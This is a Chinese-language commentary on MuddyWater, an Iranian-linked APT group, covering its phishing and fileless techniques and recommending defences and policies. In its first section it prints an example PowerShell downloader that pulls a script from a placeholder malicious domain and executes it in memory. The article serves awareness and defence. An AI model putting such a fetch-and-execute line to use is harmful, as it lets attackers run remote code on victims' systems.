2025年12月初,以色列政府官网(gov.il)悄然上线一则安全通告,标题直指一个代号为“MuddyWater”(泥水)的网络威胁组织。尽管页面内容因Cloudflare验证机制未能完整抓取,但结合多方情报与历史攻击模式,网络安全界迅速达成共识:这是一次针对国家关键部门的高危预警。
通告虽简,却如警钟长鸣——MuddyWater正以更狡猾的鱼叉式钓鱼手段,瞄准政府机构、国防承包商、能源与电信等核心命脉行业。其攻击手法已从早期粗糙的宏文档演进为高度定制化、多阶段投递的复合式渗透体系,不仅具备持久潜伏能力,还能在目标内网中横向移动、窃取敏感数据,甚至操控工业控制系统。
这场由中东地缘政治驱动的数字暗战,早已超越国界。就在以色列发布预警的同时,欧洲多国CERT机构也相继通报类似攻击事件;而在亚太地区,包括新加坡、日本在内的关键基础设施运营商亦检测到源自同一TTPs(战术、技术与程序)框架的可疑活动。值得注意的是,尽管目前尚无公开证据表明MuddyWater已大规模针对中国大陆目标,但其攻击策略与中国所面临的APT(高级持续性威胁)环境高度重合——这无疑为我国关键信息基础设施的安全防御敲响了警钟。
一、“泥水”何来?一个伊朗背景APT组织的进化史
MuddyWater并非新面孔。自2017年首次被卡巴斯基披露以来,该组织便因其与伊朗伊斯兰革命卫队(IRGC)情报部门的潜在关联而备受关注。其早期活动集中于中东邻国,主要通过伪装成政府公文或商业合同的RTF、DOC文件投递PowerShell后门,利用Windows脚本宿主(wscript/cscript)执行恶意代码。
然而,近年来MuddyWater展现出惊人的技术迭代能力。据以色列国家网络局(INCD)2024年发布的分析报告,该组织已全面转向“无文件攻击”(Fileless Attack)范式:不再依赖传统可执行文件落地,而是通过Office文档中的VBA宏触发内存加载器,直接从远程服务器拉取加密的PowerShell或Python载荷,在系统内存中完成解密与执行,全程不写入磁盘。
“这种‘Living-off-the-Land’(LoTL)策略极大规避了传统杀毒软件的特征检测。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“攻击者大量复用系统自带工具如certutil、bitsadmin、mshta,甚至PowerShell的Invoke-WebRequest,使得流量和进程行为在表面上完全合法。”
例如,一段典型的MuddyWater PowerShell下载器代码可能如下所示:
$u = "hxxps://malicious[.]domain/update.ps1"
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")
$payload = $wc.DownloadString($u)
IEX $payload
表面看,这只是普通网页请求;但若结合上下文——比如该脚本由一封主题为“贵司投标文件需补充材料”的邮件附件触发,且目标IP从未访问过该域名——则极可能是攻击链的一环。
更令人警惕的是,MuddyWater开始使用合法云服务(如GitHub Gist、Pastebin、甚至Google Drive)作为C2(命令与控制)通道的跳板。攻击者将加密指令隐藏在看似无害的文本片段中,再由本地脚本定期轮询解析。这种方式不仅绕过防火墙对已知恶意IP的封锁,还利用了企业对主流SaaS平台的信任白名单。
二、鱼叉之锋:从“广撒网”到“精准制导”
传统网络钓鱼常以海量垃圾邮件“碰运气”,而MuddyWater代表的现代APT钓鱼则是“外科手术式打击”。其核心在于社会工程学的高度定制化。
以色列通告中提到,近期攻击邮件普遍以“国际合作项目进展”“紧急安全漏洞通报”或“供应链合规审查”为诱饵。发件人地址经过精心伪造,常模仿真实合作伙伴的域名(如将defense-contractor.co.il篡改为defence-contractor.co.il,仅替换一个字母),甚至使用已被攻陷的第三方供应商邮箱作为跳板,实现“可信转发”。
附件不再是简单的.exe或.zip,而是伪装成PDF、Excel表格或OneNote笔记本。这些文件本身可能无害,但内嵌的超链接或OLE对象会触发后续动作。例如,一个名为“Q4_Infrastructure_Security_Report.one”的OneNote文件,打开后会自动加载远程图片——而该图片URL实则指向一个PowerShell脚本托管点。
“现在的钓鱼已经不是‘点不点链接’的问题,而是‘你根本不知道自己点了什么’。”芦笛解释道,“很多攻击利用Office应用的自动预览或索引功能,在用户未主动交互的情况下就完成了初始感染。”
更隐蔽的是“双因子钓鱼”(Two-Factor Phishing)变种:攻击者搭建高仿真的Microsoft 365或Okta登录页面,当受害者输入账号密码后,页面并不报错,而是立即跳转至真实的双因素认证界面。用户以为只是正常登录,殊不知验证码已被实时转发至攻击者服务器,完成账户接管。
此类手法已在2024年德国某能源公司数据泄露事件中得到验证——攻击者通过窃取高管邮箱,进一步向财务部门发送“紧急付款指令”,导致数百万欧元损失。
三、技术对抗:从边界防御到“欺骗即防御”
面对如此精密的钓鱼攻击,传统“防火墙+杀毒软件”的纵深防御体系已显疲态。以色列通告建议的关键措施——启用高级邮件过滤、沙箱分析、强制补丁更新——固然必要,但远远不够。
真正的防御前沿,正在向行为分析与欺骗技术(Deception Technology)转移。
以邮件网关为例,现代反钓鱼引擎不再仅依赖URL黑名单或附件哈希比对,而是引入机器学习模型分析邮件元数据:发件人历史行为是否异常?邮件语言风格是否与已知联系人一致?附件中是否存在隐藏的宏或外部链接?甚至,收件人是否在非工作时间收到“紧急”邮件?
“我们内部测试显示,基于BERT的邮件语义分析模型对MuddyWater类钓鱼邮件的识别准确率可达92%以上。”芦笛透露,“关键在于构建高质量的负样本库——不仅要收集恶意邮件,还要标注出那些‘看起来可疑但实际合法’的业务邮件,避免误杀。”
在终端侧,EDR(端点检测与响应)系统正成为最后一道防线。不同于传统AV的签名匹配,EDR持续监控进程树、网络连接、注册表修改等行为。例如,当一个Word进程突然启动powershell.exe并尝试连接境外IP,即使该PowerShell脚本未被标记为恶意,EDR也能基于行为链发出告警。
更前沿的是“蜜罐邮件”(Honey Email)策略:安全团队为主机部署一批永不使用的虚拟邮箱,一旦这些地址收到邮件,即可100%判定为扫描或钓鱼行为,并自动触发溯源与阻断。
代码层面,企业也可通过组策略限制高风险操作。例如,禁用Office宏自动执行:
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000004
或通过AppLocker阻止非授权脚本引擎运行:
<AppLockerPolicy Version="1">
<RuleCollection Type="Script" EnforcementMode="Enabled">
<FilePublisherRule Id="Allow_Signed_PS1" Name="Allow Signed PowerShell Scripts" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="%OSDRIVE%\Scripts\*.ps1" />
</Conditions>
</FilePublisherRule>
</RuleCollection>
</AppLockerPolicy>
“技术防御必须与人员意识培训形成闭环。”芦笛强调,“再先进的系统也抵不过一个员工点击‘启用内容’。”
四、国际镜鉴:从特拉维夫到北京的安全启示
MuddyWater的全球活动揭示了一个残酷现实:关键基础设施已成为网络战的默认战场。以色列作为长期处于高强度网络对抗环境的国家,其“全民皆兵”式的网络安全文化值得借鉴。
其一,强制事件上报机制。以色列要求所有关键部门在发现疑似APT活动后2小时内向国家CERT报告。这种快速情报共享使防御方能迅速生成IOC(入侵指标)并下发全网阻断规则,将单点失陷转化为集体免疫。
其二,红蓝对抗常态化。以色列国防部每年组织“国家级网络演习”,模拟MuddyWater等组织的攻击路径,检验各机构应急响应能力。演习不追求“零失分”,而是暴露流程短板——例如,某次演习中发现,80%的单位无法在72小时内定位初始入侵点。
反观国内,尽管《网络安全法》《关键信息基础设施安全保护条例》已明确运营者主体责任,但在实际执行中,仍存在“重建设、轻运营”“重合规、轻实战”的倾向。部分单位将安全等同于购买设备,却忽视日志分析、威胁狩猎等主动防御能力建设。
“我们调研发现,超过60%的国内关键基础设施单位未部署EDR,邮件网关仍依赖静态规则。”芦笛坦言,“当攻击者已进入内网横向移动时,防火墙上的告警灯可能还在安静地闪烁绿色。”
更值得警惕的是供应链风险。MuddyWater多次通过攻击软件开发商或IT服务商,间接渗透最终目标。2023年某中东电信公司遭袭,源头竟是其使用的第三方运维工具被植入后门。这提醒我们:对供应商的安全审计不能流于形式,必须延伸至代码开发、构建、分发全链条。
五、构建中国式反钓鱼免疫体系
面对日益复杂的钓鱼威胁,中国亟需构建一套融合技术、制度与文化的综合防御体系。
技术上,应推动“零信任架构”在关键行业的落地。默认不信任任何用户或设备,每次访问都需验证身份与权限。同时,加快国产化EDR、SOAR(安全编排自动化响应)平台的研发与适配,减少对国外安全产品的依赖。
制度上,可借鉴以色列经验,建立关键基础设施网络安全事件强制上报与共享机制。由国家级CERT牵头,整合运营商、云服务商、安全厂商的数据,构建动态威胁情报池。对瞒报、迟报行为依法追责,形成“早发现、早处置”的正向激励。
文化上,必须打破“安全是IT部门的事”的误区。定期开展沉浸式钓鱼演练——不是发个通知就算培训,而是真实发送模拟钓鱼邮件,对点击者进行一对一辅导。让每位员工都成为“人肉防火墙”。
“反钓鱼不是一场战役,而是一场永不停歇的军备竞赛。”芦笛总结道,“攻击者每天都在进化,我们的防御也必须从‘被动堵漏’转向‘主动狩猎’。唯有如此,才能在数字时代的‘泥水’中,守住国家网络空间的清澈与安全。”
编辑:芦笛(公共互联网反网络钓鱼工作组)